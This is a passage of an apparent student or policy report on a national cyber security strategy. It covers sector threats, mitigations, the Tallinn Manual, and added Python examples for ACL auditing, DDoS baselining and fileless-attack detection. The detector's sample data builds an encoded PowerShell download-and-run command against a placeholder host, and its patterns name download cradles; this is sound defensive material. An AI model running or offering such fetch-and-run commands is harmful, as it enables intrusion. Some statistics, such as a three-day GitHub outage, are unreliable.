As outlined in Cisco’s 2017 midyear cyber security review (CISCO, 2017), 180 security officials working in the transportation industry around the world were asked whether they were aware of, and which types of, threats they were expecting on current infrastructures. It was revealed that just over 60 of them prioritized advanced persistent threats when considering the current state of industry technology; an APT is regarded as a breach that has gone undetected for a long period of time. The rest of the professionals interviewed said that mobile devices and the evolution of cloud computing provided a growing threat for the industry. Many of the interviewees admitted that these threats could be mitigated if given enough time; however, 35% of them mentioned that they receive thousands of security alerts daily, of which on average only 19% are legitimate, and only 30% of those are fixed.

Many cities have adopted more complex transportation systems, so modern travel has become more reliant on the functionality of these systems, which include traffic lights, sensors and the networks for public transportation. With this comes an attraction for cyber criminals: they can not only attack the information systems to steal and destroy critical data, they may also be able to take control of the operational systems of an entire city and disrupt its whole operation, potentially bringing it to a standstill depending on the scope of the attack. Much of the data that is stored can be used to track the location of physical assets and all interconnected information such as flight paths and automotive control systems. An example of this was the cyber-attack of July 2013 in which the passport control systems at Istanbul’s central airport were hacked and disrupted, causing major passenger delays because travellers were not allowed to enter the country without the system’s verification; another was in Lodz, Poland, where a TV remote was modified to change track points, giving it control over the tram control systems (Marsh, 2015).

Due to the growth of the services being provided in this industry, there is a rapid demand for talented individuals with a wealth of knowledge and experience; the rate of growth is outpacing the number of trained staff available for the jobs in this sector, particularly given the lack of experience in industry-specific threats and the employee practices that are unique to the transportation industry.

Public WiFi is a growing trend, especially on public transport services. According to the ITRC (Identity Theft Resource Center), public WiFi usage in the UK increased by 240% from 2011 to 2012 and, of the 377 initial responses, 78% of people had regularly used public WiFi hotspots (ITRC, 2012). Bearing in mind that this survey was taken in 2012, when public WiFi was only gaining attention, the number of internet users has nearly doubled from 2012 (2.336 million) to 2017 (41.157 million), correlating with public transport WiFi usage (Miniwatts, 2017).

Depending on the sophistication of public WiFi networks, they can be an access point for hackers to steal information from the users and employees connected to them, or a tool for ‘socially engineering’ other attacks; a dictionary attack is one of the simplest ways to gain access to a WPA2 WiFi network, especially if the default credentials have not been changed.

4.2.1. Recommendations & Mitigations

Frameworks that already exist should be developed further, with NIST standards implemented to update and bolster the policies that are in place to protect against foreign actors. The managing bodies that regulate these organizations need to establish effective risk governance in order to engage with, and most importantly be aware of, the industry-specific attacks. Effective incident response plans need to be implemented to ensure that, in the event of a cyber-attack, all critical systems and data can be closed off and safeguarded until the threat has been dealt with; this includes cutting off all control systems to physical assets and having means of alternative control if the primary controls have been exposed (Consultation -> Risk Analysis -> Implementation).

Self-driving vehicles are a small part of the transportation sector that now needs to be incorporated into security considerations. The National Highway Traffic Safety Administration (NHTSA) has conducted research relating to the security and defence systems of automobiles; its aim is to enhance road safety and bring down the number of crashes caused by human error through the implementation of sensors and emergency braking systems, but in doing so it has also factored in the cyber security challenges that this poses. Some of the practices it has introduced allow the organization to proceed with its research whilst tackling the cyber security issues alongside it, and these can be used for nearly all automated transportation services:

- Isolation of critical control systems
  o In the event of a successful attack, the critical systems responsible for the safety of the individuals within the system are protected and do not allow any external threat control of these systems; this typically results in a forced system shutdown to prevent the manipulation of controls.
- Real-time detection
- Real-time response
- Analysis and rectification of exploits


4.3. National Health Services

Health services are likely targets due to the importance and urgency of the information they store. Upwards of 16 million records were stolen from national health organizations in the US in 2016 (MYRSINI ATHINAIOU, 2017), and in the same year healthcare was reported to be the 5th most targeted industry according to the IBM X-Force Threat Intelligence Index 2017. The index also shows that the attacks within the healthcare sector are dominated by insiders unknowingly exposing critical systems; however, this is shown to be decreasing, which is likely a direct result of employee training and practice standards (IBM Issues 2017).

(IBM Issues 2017)

It is clear that most attacks stem from this insider exposure: employees are typically unaware that they are introducing malicious code into the systems and compromising critical data. However, data is not the only target for many attackers; examples of the altering of electronic organs and the exploitation of scanning machines have been seen before, and depending on the motive of the attacker the worst case can potentially result in death (Johns Hopkins, 2015) (BBC NEWS, 2015).


A major example of a recent ransomware attack is the NHS battle against ‘WannaCry’, which locked and encrypted user data and demanded a ransom to be paid in bitcoin to release it. As mentioned before, this would have resulted from some form of phishing attack used to gain persistence in the network whilst going unnoticed and spreading to other parts of the network; a backdoor is also created to allow the attackers to stay connected in the event of a software update (a backdoor is a method of bypassing the normal authentication methods by creating persistence in the target network).

4.3.1. Mitigations

For an organization, ransomware involves the infection of information systems, namely servers and workstations. Infection itself can take place through many different methods, and there are different mechanisms an organization can implement to stop its systems becoming infected and so prevent the attack before it has even started; the different methods of gaining access to a target system, and their mitigations, have been identified in section [2.2] of this plan.

Preventing a breach is ideally what an organization would like to achieve; however, this is not always possible. Certain mechanisms can be implemented to ensure that the risk of experiencing a ransomware attack is minimized:

- Permissions and rights
  o Organized ransomware usually targets shared folders, since they are shared across multiple workstations and so are the most impactful. The 2017 Varonis data risk report revealed that 20% of workstation folders were accessible by all users across the participating organizations, meaning that any user could be targeted to infect that portion of the data. Organizations should limit the data each user has access to, to only what is required for their job role, in order to minimize the amount of data affected if that user’s workstation and credentials are breached (VARONIS, 2017).
- Code execution policy (macros)
  o It is good practice for network administrators to prevent the execution of code that has not already been trusted; code that has not been authorised cannot run, which deters the execution of ransomware. Organizations can prevent the use of macros (automation of repetitive code) so that the ransomware cannot execute repeatedly to encrypt large amounts of data.
  o However, policies need to be established to ensure that legitimate code that is required to execute can still do so; a balance needs to be found (NCSC, 2016).
- Removable media control
  o Controlling what types of removable media can be attached to machines reduces the risk of malicious devices being connected, whether unwittingly by employees or deliberately by malicious individuals.
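The ‘Permissions and rights’ point can be measured rather than just stated. The following is an added example, not taken from this document or from the Varonis report, that audits a constructed set of shared-folder ACLs (share names, groups, users and rights are all made up) to report what fraction of shares every user can write to, and how many shares ransomware running under any one compromised account could reach.

```python
"""Added example (not from the strategy document or the Varonis report): an
ACL audit for the 'Permissions and rights' ransomware mitigation.  It reports
how much shared data is writable by every user, and the blast radius of a
single compromised account.  Shares, groups, users and rights are constructed.
"""
BROAD_GROUPS = {"Everyone", "Authenticated Users", "Domain Users"}
WRITE_RIGHTS = {"write", "modify", "full"}   # rights that let ransomware encrypt


def members(principal, groups, all_users):
    """Expand a user or (possibly nested) group name to the set of concrete users."""
    if principal in BROAD_GROUPS:
        return set(all_users)
    if principal not in groups:
        return {principal}             # a plain user account
    users = set()
    for m in groups[principal]:
        users |= members(m, groups, all_users)
    return users


def writers(acl, groups, all_users):
    """Users who hold a write-class right on one share."""
    users = set()
    for principal, right in acl:
        if right in WRITE_RIGHTS:
            users |= members(principal, groups, all_users)
    return users


def shares_writable_by_all(shares, groups, all_users):
    """Shares where every user in the organisation can write (the Varonis 20%)."""
    everyone = set(all_users)
    return sorted(s for s, acl in shares.items()
                  if writers(acl, groups, all_users) >= everyone)


def blast_radius(user, shares, groups, all_users):
    """Shares that ransomware running under 'user' could encrypt."""
    return sorted(s for s, acl in shares.items()
                  if user in writers(acl, groups, all_users))


def report(shares, groups, all_users):
    open_shares = shares_writable_by_all(shares, groups, all_users)
    return {
        "pct_writable_by_all": round(100 * len(open_shares) / len(shares), 1),
        "open_shares": open_shares,
        "blast_radius": {u: blast_radius(u, shares, groups, all_users)
                         for u in sorted(all_users)},
    }


# Constructed environment: four users, one nested group, five shares.
GROUPS = {
    "finance": ["alice"],
    "hr": ["bob"],
    "Domain Admins": ["carol"],
    "ops": ["hr", "dave"],             # nested group: every hr member is in ops
}
ALL_USERS = ["alice", "bob", "carol", "dave"]
SHARES = {
    r"\\fs\finance": [("finance", "modify"), ("Domain Users", "read")],
    r"\\fs\hr": [("hr", "modify")],
    r"\\fs\it": [("Domain Admins", "full")],
    r"\\fs\public": [("Everyone", "modify")],        # the share to narrow down
    r"\\fs\archive": [("Domain Users", "read"), ("ops", "write")],
}


def run_example():
    return report(SHARES, GROUPS, ALL_USERS)


if __name__ == "__main__":
    for key, value in run_example().items():
        print(key, value)
```

Replacing the constructed SHARES and GROUPS with an export of real ACLs and group memberships gives the same two numbers for a live estate.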

There are a number of different software platforms that can be used to protect an organization against ransomware attack, both open source (free) and licenced; it is advisable for at least one of these, or another ransomware prevention product, to be installed and running on corporate machines:

- HitmanPro.Alert (Licenced)
  o Behavioural technology
  o Cloud scanning
- MalwareBytes
  o Ransomware protection
  o Malware & virus
  o Web protection
- Watchpoint Cryptostopper (Licenced)
  o Behavioural technology
- Zemana
  o Anti-malware
  o Cloud scanning
- EMET (Free)
  o Certification scanner
  o Execution policy manager


4.4. Public Utilities

Public utility service providers are massive targets, typically for those looking to damage company reputation and disrupt public well-being; hacktivism and state or state-sponsored motives are commonly linked with ‘disruption tactics’, making this industry a prime target.

DDoS attacks are a convenient and low-risk method of disrupting a victim’s service with limited resources to hand; the majority of attacks seen so far utilize amplifiers to boost their traffic, whether through organised infrastructure or by manipulating unwitting machines.

Verizon’s 2014 Data Breach Investigations Report revealed that 14% of all cyber-attacks involving utilities included some form of DDoS attack (Verizon, 2014); the same report states that the utilities industry was fifth in line for the most data breaches and stolen information in 2013.

Utility companies need to be vigilant and aware of the threats that now face their sector, specifically the evolution of DDoS attacks (SAHBA KAZEROONI, 2015):

- The amount of bandwidth now available to an individual computer system is massive compared to a few years ago, when 1 Gb/s was a typical value recorded. More recently, GitHub experienced its own DDoS attack, enduring 1.35 terabits per second of traffic and shutting down GitHub services for nearly 3 days (LILY HAY NEWMAN (b), 2018); this attack did not use a traditional botnet but used Memcached servers to amplify the amount of traffic sent. This not only shows how powerful DDoS attacks have become but also indicates the kind of hardware being used; as new attacks are introduced, legacy equipment becomes surplus and organizations need to keep upgrading to match the development of new attacks (SAHBA KAZEROONI, 2015).
- When a product or service becomes mainstream in the eyes of the public it starts to become commercialized, and this is evident with DDoS capabilities: relevant services and botnets (networks of infected computers) are being rented out to those who want to attack a target easily (average $25/h) (JOHN LEYDEN, 2017). This means that nearly anyone with internet access is able to pay to conduct a DDoS attack with serious power and minimal resources of their own.
- As mentioned, DDoS attacks are rarely used for financial gain; however, with the evolution of cyber threats, attackers are now using DDoS capabilities for cyberextortion schemes, keeping a service down whilst demanding a financial ransom to stop the attack and allow the company to resume its services as normal (46% of all recorded criminal DDoS attacks are used in this manner) (ZEIFMAN, I., 2015). This type of cyber-attack is extremely effective against organizations within the utilities industry because it is often less costly for them to pay the ransom than to spend the money recovering and salvaging the situation, not to mention the damage that can be done to the reputation of the organization.

4.4.1. Mitigations

There are several steps that can be put in place at a managerial level to minimize the risk of DDoS attacks affecting the operations of the business and to deter them (SAHBA KAZEROONI, 2015):

- Primarily, a policy or plan needs to be implemented to ensure that the business is prepared for the eventuality of a DDoS attack. This will include thresholds for the different actions applicable to the situation (e.g. how long the business should wait before paying a ransom), how operations will continue when services are under attack and unavailable, and what control systems are put in place (backups etc…) along with how they should be used.
- Organizations need to establish what a DDoS would look like on their systems specifically. This can be done by simulating an attack on their physical systems to create a benchmark and other variables, typically known as black-box testing; along with creating relevant benchmarks, it can also indicate areas that can be protected further, deterring future attacks by making a DDoS harder to perform successfully, and it can save time when trying to identify the issue in the early stages.
- Businesses are advised to have their go-to contacts ready ahead of time to ensure there is an option to fall back on for damage control and deterring the attack; this applies not only to technical staff but also to legal advisers who can give recommendations and advice moving forward.
- Organizations are advised to have their systems covered by cyber insurance, which can aid in the recuperation and recovery stage after a successful attack.
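The first two points (action thresholds, and knowing what a DDoS looks like on your own systems) can be made concrete. The following is an added example, not part of this document or of any cited vendor’s product, that benchmarks a quiet period of constructed flow records to derive alerting thresholds, grades live seconds against the response plan’s action tiers, and picks out the Memcached reflection pattern described above (large unsolicited UDP replies from port 11211); the addresses, volumes and tier names are assumptions.

```python
"""Added example (not from the strategy document or any cited vendor): a
traffic baseline / threshold model for DDoS readiness.

It covers two of the 4.4.1 mitigations: establishing what normal inbound
traffic looks like from a benchmark period and turning it into thresholds for
the response plan's action tiers, and recognising a reflected/amplified flood
of the Memcached kind, where the victim receives large UDP responses from
port 11211 that it never asked for.  Flow records, addresses and volumes are
constructed; 11211 is the standard Memcached port.
"""
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean, pstdev

MEMCACHED_PORT = 11211
VICTIM = "203.0.113.10"   # constructed address from the documentation range


@dataclass(frozen=True)
class Flow:
    ts: int          # epoch second the flow was observed in
    src: str
    sport: int
    dst: str
    dport: int
    proto: str       # "udp" or "tcp"
    nbytes: int
    packets: int


def inbound_bytes_per_second(flows, victim=VICTIM):
    """Sum bytes delivered to the victim per one-second bucket."""
    buckets = defaultdict(int)
    for f in flows:
        if f.dst == victim:
            buckets[f.ts] += f.nbytes
    return dict(buckets)


def derive_thresholds(baseline_flows, victim=VICTIM, warn_sigma=3, act_sigma=10):
    """Benchmark a quiet period and derive two action thresholds in bytes/s."""
    rates = list(inbound_bytes_per_second(baseline_flows, victim).values())
    mu, sigma = mean(rates), pstdev(rates)
    return {"warn": mu + warn_sigma * sigma, "act": mu + act_sigma * sigma}


def classify_rate(rate, thresholds):
    """Map an observed inbound rate onto the response plan's action tiers."""
    if rate >= thresholds["act"]:
        return "activate_mitigation"   # upstream scrubbing, ISP and legal contacts
    if rate >= thresholds["warn"]:
        return "engage_contacts"       # pre-arranged technical contacts on standby
    return "monitor"


def reflection_sources(flows, victim=VICTIM, port=MEMCACHED_PORT, min_bytes_per_packet=1000):
    """Return reflectors sending the victim large, unsolicited UDP replies.

    A reply is solicited only if the victim itself sent a UDP request to that
    (host, port) pair in the same capture; large unsolicited replies from the
    Memcached port are the signature of an amplification attack.
    """
    requested = {(f.dst, f.dport) for f in flows if f.src == victim and f.proto == "udp"}
    reflectors = defaultdict(int)
    for f in flows:
        if (f.dst == victim and f.proto == "udp" and f.sport == port
                and f.packets and f.nbytes / f.packets >= min_bytes_per_packet
                and (f.src, f.sport) not in requested):
            reflectors[f.src] += f.nbytes
    return dict(reflectors)


# Constructed benchmark: eight quiet seconds alternating 100 kB/s and 120 kB/s.
BASELINE = [Flow(t, "198.51.100.1", 443, VICTIM, 50000 + t, "tcp",
                 100000 if t % 2 == 0 else 120000, 80) for t in range(8)]

# Constructed capture at t=100: one legitimate Memcached exchange, two reflectors,
# one small UDP reply below the amplification size, and ordinary web traffic.
CAPTURE = [
    Flow(100, VICTIM, 40000, "10.0.0.5", MEMCACHED_PORT, "udp", 60, 1),
    Flow(100, "10.0.0.5", MEMCACHED_PORT, VICTIM, 40000, "udp", 1200, 1),
    Flow(100, "198.51.100.7", MEMCACHED_PORT, VICTIM, 80, "udp", 1400000, 1000),
    Flow(100, "198.51.100.8", MEMCACHED_PORT, VICTIM, 80, "udp", 700000, 500),
    Flow(100, "198.51.100.9", MEMCACHED_PORT, VICTIM, 80, "udp", 200, 1),
    Flow(100, "198.51.100.1", 443, VICTIM, 50100, "tcp", 50000, 40),
    Flow(101, "198.51.100.1", 443, VICTIM, 50101, "tcp", 150000, 120),
    Flow(102, "198.51.100.1", 443, VICTIM, 50102, "tcp", 100000, 80),
]


def run_example():
    """Benchmark, then grade each captured second and list reflectors."""
    thresholds = derive_thresholds(BASELINE)
    actions = {t: classify_rate(r, thresholds)
               for t, r in sorted(inbound_bytes_per_second(CAPTURE).items())}
    return thresholds, actions, reflection_sources(CAPTURE)


if __name__ == "__main__":
    for item in run_example():
        print(item)
```

The baseline here is deliberately tiny; in practice the quiet period should span at least a full business cycle so that the derived thresholds reflect peak legitimate load.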


4.5. Government Services

Government critical systems are commonly targeted due to their monumental importance to a functioning economy; services such as benefits, waste management, public CCTV surveillance, housing and administration only scratch the surface of how heavily the nation depends on these critical systems.

Fileless attacks are becoming more of a trend, aiding in avoiding forensic detection and traceability; the number of fileless malware attacks grew at a rate of about 10% in 2016. The attack is essentially undetectable and leaves little to no trace because no malicious software is installed on the victim’s system (MARIA KOROLOV, 2017), which results in most modern antivirus systems not detecting a breach. The Ponemon Institute’s Endpoint Security Report states that within that year 54% of companies experienced some form of attack that compromised data and IT infrastructure, and 77% of those were reported to have used fileless techniques. Using tools already integrated into the operating system, such as PowerShell or WMI, allows attackers to run scripts without creating many new files on the hard disk; this makes traces harder to identify, since the scripts can be executed directly from memory (CANDID WUEEST, 2016).


(BARKLY, 2017) [Fig 7.8A]

(CANDID WUEEST, 2016) [Fig 7.8B]

4.5.1. Recommendations

Fileless attacks, although around for just over a decade, have only recently been utilized efficiently by attackers. Currently there is no set strategy for preventing these types of attack; however, methods have been developed to detect and deter them. Monitoring platforms allow administrators to effectively overview and diagnose their networks whilst also identifying the symptoms of this type of attack; some organizations that offer this service are:

- Cybereason’s automated detection tool: its main function is to investigate different patterns and correlate past and present activity whilst analysing in real time using machine learning algorithms (PAUL STAMP, 2017).

[Fig 7.8C] (PAUL STAMP, 2017)

- Endgame SOC platform: kernel-level analysis is deployed to read every shell execution and prevent it when malicious code is detected. This also gives complete visibility of the attack, exposing the source and making it easier for administrators to patch the vulnerability; the platform also conducts in-memory analysis (ENDGAME, 2017).

To minimize the risk of an organization being affected by this type of attack, it is advised that permissions are closely managed and employees are given rights for exactly what they require. This ensures that attackers would need to target the employees who hold the appropriate root privileges to execute the code, and the organization can focus more of its training and education on those individuals, making them less likely to expose themselves (BUTTLER, P., 2017).
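The monitoring described in 4.5 and 4.5.1 comes down to inspecting how built-in interpreters are launched. The following is an added example, not code from this document, Cybereason or Endgame, that applies the fileless indicators discussed above (PowerShell started with encoded, hidden, profile-less or download-and-run command lines, and WMI spawning processes) to constructed process-creation log lines, and raises the severity when the account is privileged, as the permissions point above suggests. The log format, users, hosts and indicator list are assumptions.

```python
"""Added example (not from the strategy document, Cybereason or Endgame): a
detector for fileless-style PowerShell/WMI use in process-creation logs.

It matches the indicators discussed in 4.5 against constructed log lines in a
simple key=value format; -EncodedCommand payloads are decoded so that the
indicators are also matched inside them.  Users, hosts and log content are
constructed; 'elevated=yes' marks an administrative account (4.5.1).
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "wmic.exe", "cmd.exe", "mshta.exe"}

# indicator name -> pattern applied to the lower-cased command line (decoded too)
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"-nop(?:rofile)?\b"),
    "execution_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass"),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression"),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "wmi_process_create": re.compile(r"\bwmic\b.*process\s+call\s+create"),
}
ENCODED = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Turn 'k=v k="v with spaces"' into a dict (constructed log format)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD.finditer(line)}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    for flag, blob in ENCODED.findall(cmdline):
        # PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec
        if "encodedcommand".startswith(flag.lower()) or flag.lower() == "ec":
            try:
                return base64.b64decode(blob).decode("utf-16le", errors="ignore")
            except ValueError:
                continue
    return ""


def encode_ps(command):
    """Build a constructed encoded command line for the sample data."""
    return base64.b64encode(command.encode("utf-16le")).decode()


def analyse_event(event):
    """Return the indicator names that fire for one process-creation event."""
    cmd = event.get("cmdline", "")
    decoded = decode_encoded_command(cmd)
    text = (cmd + " " + decoded).lower()
    hits = [name for name, pat in INDICATORS.items() if pat.search(text)]
    if decoded:
        hits.insert(0, "encoded_command")
    if (event.get("parent", "").lower() in OFFICE_PARENTS
            and event.get("image", "").lower() in INTERPRETERS):
        hits.append("office_spawned_interpreter")
    if hits and event.get("elevated") == "yes":
        hits.append("privileged_context")   # admin rights widen what the script can do
    return hits


def severity(hits):
    return "high" if len(hits) >= 3 else "medium" if hits else "none"


def analyse(lines):
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = analyse_event(ev)
        findings.append({"ts": ev.get("ts"), "user": ev.get("user"),
                         "image": ev.get("image"), "indicators": hits,
                         "severity": severity(hits)})
    return findings


# Constructed sample: a routine scheduled script, a document macro launching an
# encoded download-and-run command, and wmic spawning a hidden interpreter.
SAMPLE = [
    'ts=2018-05-04T09:00:01 user=alice elevated=no parent=explorer.exe image=powershell.exe '
    'cmdline="powershell.exe -File C:\\scripts\\backup.ps1"',
    'ts=2018-05-04T09:14:32 user=bob elevated=yes parent=winword.exe image=powershell.exe '
    'cmdline="powershell.exe -NoP -W Hidden -Enc '
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')") + '"',
    'ts=2018-05-04T09:20:10 user=carol elevated=no parent=cmd.exe image=wmic.exe '
    "cmdline=\"wmic process call create 'powershell -w hidden -nop -c Get-Date'\"",
]


def run_example():
    return analyse(SAMPLE)


if __name__ == "__main__":
    for finding in run_example():
        print(finding["severity"], finding["user"], finding["indicators"])
```

Feeding real process-creation events (for example from a Sysmon or EDR export, mapped to the same field names) into analyse() gives a first-pass triage list for the monitoring platforms described above.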


5. The Tallinn Manual

The Tallinn Manual was developed under the NATO Cooperative Cyber Defence Centre of Excellence by an international group of about 20 experts in 2013. It was originally titled Tallinn Manual on the International Law Applicable to Cyber Warfare but was later amended because it relates not only to cyber warfare but also to cyber conflicts within sectors of industry.

Overall it relates to operations and their legality within the cyber ‘realm’; it aims to provide and promote clarity for the different functions of cyber networking and is designed to define what is and is not acceptable when operating within this environment.

The 642-page document includes a dissection and analysis of the current global legal fundamentals that arise in cyber operations and how each applies to a different scenario; it demonstrates the complexities and ‘blurred lines’ that pollute cyber environments.

Certain threat and attack scenarios are identified within the document, and these are then theorised with recommendations and prospective actions for altercations between different countries. Examples are given to illustrate the power one nation can have over another nation state when it holds cyber dominance: the top powers of the world can bully those beneath them into complying with actions that were not regulated before. Prior to this paper there was no clear, set response to an attack, which made it very difficult for those on the receiving end to react.

The following nations, as of 2017, are sponsoring participants of the NATO Cooperative Cyber Defence Centre of Excellence: Belgium, the Czech Republic, Estonia, the United States, France, the Netherlands, Italy, Germany, Greece, Hungary, the United Kingdom, Latvia, Lithuania, Poland, Slovakia, Spain and Turkey.


6. Development

Nation-A must acquire the appropriate tools and capabilities to protect against a cyber threat that will continue to evolve after the time of writing of this report (PORCHE, I.R.I., 2018):

• Development of talented individuals
  o Schools and early learner programs
  o CCC (Children Cyber Challenge)
  o Higher learning apprentice opportunities
  o Post graduate specialist training
  o Teacher further development
  o Training for Armed Forces roles
  o Digital and cyber skills study integrated in schools
• Investment opportunities for new E-Companies, ongoing support for cyber capabilities
  o Appropriate application processes for funding and growth
  o Private sector growth
  o Ongoing funding for research and development towards new ideologies and tools
• International action
  o Continued clarification of international law
  o Cooperation and cohesion with international law enforcement
  o Drafting and provisioning of international technical standards
  o Governance of emerging technologies
  o International encryption policies to promote ‘default’ configurations
  o Cyber partnerships within organizations like the UN and NATO

Development and planning can benefit governments and progress towards the current objectives:

• Effective detection and investigation of malicious cyber activities
• Reduction in international cybercrime, eliminating local regulation loopholes
• Capability to manage and respond to cyber incidents effectively
• Creation of sustainable home-grown talented individuals
• Development of future technologies

Training and education need to be adapted appropriately, within the training programs for the development of future security professionals, to suit the evolution of the cyber threats faced now and hereafter.

6.1. Further Documentation

Use of Simulation to Achieve Better Results in Cyber Military Training

DOI: 10.1109/MILCOM.2015.7357620

This document addresses how future cyber professionals are to be trained given the complexity of cyber technologies and the evolving threat. Relating to the Brazilian armed forces’ cyber command, the case study analyses the advantages and disadvantages of using simulators in training and presents its recommendations.

Introduction of cyber simulators such as:

  o Cyber Protect
  o MAADNET
  o CRIAB
  o SIMOC

SIMOC (Cyber Operations Simulator) was selected to run the simulations within the experiments, and the following benefits were identified:

  o Creation of network scenarios
  o Multiple types of training
  o Re-use of attributes
  o Virtual machine support
  o Mixed network support
  o Automated processes
  o Real-time monitoring
  o Logging
  o Fair security controls

Along with the benefits, some disadvantages of the SIMOC simulator were identified:

  o No virtualization of military assets
  o No virtualization of operating systems
  o No malware detection system

eWar - Reality of Future Wars

DOI: 10.1145/2492517.2500321

- This report explains the future of cyber warfare and the development in the types of attack being forecast. Published in the IEEE database in April 2014, it was originally presented at ASONAM (Advances in Social Networks Analysis and Mining) in 2013. It gives a detailed explanation of current and future technologies that could be used to fight a cyber war, which helps when creating a cyber security strategy and trying to identify future threats.

- The paper was published in response to the ASONAM conference that took place in Niagara Falls. It has three credited authors, Gorazd Prapotnik (Faculty of Criminal Justice and Security, University of Maribor, Slovenia), Teodora Ivanusa (Professor at the University of Maribor, Slovenia) and Iztok Podbregar (Professor at the University of Maribor, Slovenia), so it is quite a credible source. All papers published on IEEE go through a peer review system to ensure the references are of the highest standard.

- This paper is in aid of completing Objective C. Along with covering the development of cyber weaponry over the years, it traces the progression of different types of warfare and how cyber warfare in particular is being developed as a new vector of attack, explaining types of cyber warfare such as out-and-out cyber war (e.g. Stuxnet), iWar, cyber espionage, botnet networks and so on…


7. References

API Research, 2017. Digitization of Operational Technologies to Drive Transportation Cybersecurity Spending to $14 Billion by 2022. Plus Company Updates, Jul 4.

ASSAF DAHAN, 2017. Cybereason Discovers Large-scale Corporate Espionage Hacking Operation. PRWeb Newswire, May 24.

B HASHIM, M.S., 2011. Malaysia's National Cyber Security Policy: The country's cyber defence initiatives. pp.1-7.

BARKLY, 2017. The 2017 State of Endpoint Security Risk [viewed 05/04/18]. Available from: https://cdn2.hubspot.net/hubfs/468115/Campaigns/2017-Ponemon-Report/barkly-2017-state-of-endpoint-security-risk-ponemon-institute-final.pdf?t=1522936160320

BBC NEWS, 2015. Medical devices vulnerable to hackers. 29 Sept.

BBC, 1998. BBC - GCSE Bitesize: How to prevent computer misuse [viewed Apr 8, 2018]. Available from: http://www.bbc.co.uk/schools/gcsebitesize/ict/legal/1dataandcomputermisuserev2.shtml

BUTTLER, P., 2017. What are file-less cyber attacks and how do you protect against them [viewed Apr 11, 2018]. Available from: https://thenextweb.com/contributors/2017/10/28/file-less-cyber-attacks-protect/

CANDID WUEEST, 2016. The Increased Use of PowerShell in Attacks. Symantec [viewed 05/04/18]. Available from: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf

CASO, J.S., 2014. The rules of engagement for cyber-warfare and the Tallinn Manual: A case study. IEEE, pp.252-257.

CISCO, 2017. Cisco 2017 Midyear Cybersecurity Report. Cisco [viewed 19/04/18]. Available from: https://www.automation.com/pdf_articles/cisco/Cisco_2017_MCR_Embargoed_til_072017_5_AM_PT_8_AM_ET.pdf

CORNERSTONE ADVISORS, 2006. Benchmarks and best practices for mid-size banks. The RMA Journal, May 1, 54.

DANIEL MAYO, 2017. Banking ICT Spending Predictor [viewed 26/03/18]. Available from: https://ovum.informa.com/resources/product-content/ict-banking-spending-predictor-infographic

DOD, 2015. DoD cyber strategy. U.S. Navy. Available from: https://www.defense.gov/Portals/1/features/2015/0415_cyber-strategy/Final_2015_DoD_CYBER_STRATEGY_for_web.pdf

DR REBECCA KLAHR, JAYESH NAVIN SHAH and SOPHIE AMILI, 2016. Cyber Security Breaches Survey 2016 [viewed 24/04/18]. Available from: https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/521465/Cyber_Security_Breaches_Survey_2016_main_report_FINAL.pdf

ENDGAME, 2017. Protect Your Memory: Endgame Stops Fileless Attacks [viewed Apr 11, 2018]. Available from: https://www.endgame.com/resource/solution-brief/pdf/protect-your-memory-endgame-stops-fileless-attacks

ENISA, 2016. ENISA Threat Landscape Report 2015 [viewed 27/03/18]. Available from: https://www.enisa.europa.eu/publications/enisa-threat-landscape-report-2017

ENISA, 2018. ENISA Threat Landscape Report 2017 [viewed 27/03/18]. Available from: https://www.enisa.europa.eu/publications/enisa-threat-landscape-report-2017

FEDERAL MINISTRY OF THE INTERIOR, 2011. Cyber Security Strategy for Germany. Federal Ministry of the Interior, Alt-Moabit 101 D, 10559 Berlin [viewed 03/03/18]. Available from: https://www.cio.bund.de/SharedDocs/Publikationen/DE/Strategische-Themen/css_engl_download.pdf?__blob=publicationFile

GLANCE, D., 2015. How we trace the hackers behind a cyber attack [viewed Mar 25, 2018]. Available from: http://theconversation.com/how-we-trace-the-hackers-behind-a-cyber-attack-51731

HMGOV, 2016. National Cyber Security Strategy 2016-2021. HM Government [viewed 08/02/18]. Available from: https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/567242/national_cyber_security_strategy_2016.pdf

HMGOV-B., 2018. Government acts to protect essential services from cyber attack. European Union News, Jan 29.

IBM Issues 2017 X-Force Threat Intelligence Index Findings. 2017. ACI Information Group [viewed 15/04/18]. Available from: http://scholar.aci.info/view/1464ec3df006b730146/15b59f999d30001daedea4e

INDIA ASHOK, 2017. What is Operation Cobalt Kitty? Notorious hacker unit OceanLotus Group's inner workings revealed [viewed 10/04/18]. Available from: https://www.ibtimes.co.uk/what-operation-cobalt-kitty-notorious-hacker-unit-oceanlotus-groups-inner-workings-revealed-1623629

INSTITUTE, I.M., 2016. Employee Errors Cause Most Data Breach Incidents in Cyber Attacks [viewed Mar 26, 2018]. Available from: https://www.prnewswire.com/news-releases/employee-errors-cause-most-data-breach-incidents-in-cyber-attacks-300342879.html

JOHN LEYDEN, 2017. Did you know: Crimelords behind DDoS attacks offer customer loyalty points? [viewed Apr 9, 2018]. Available from: https://www.theregister.co.uk/2017/03/24/ddos_attack_business_models/

JOHNS HOPKINS, 2015. Medical Devices Vulnerable to Hackers, Study [viewed 15/04/18]. Available from: http://scholar.aci.info/view/14c4821c94d000f000a/150248d3d4a000115d7

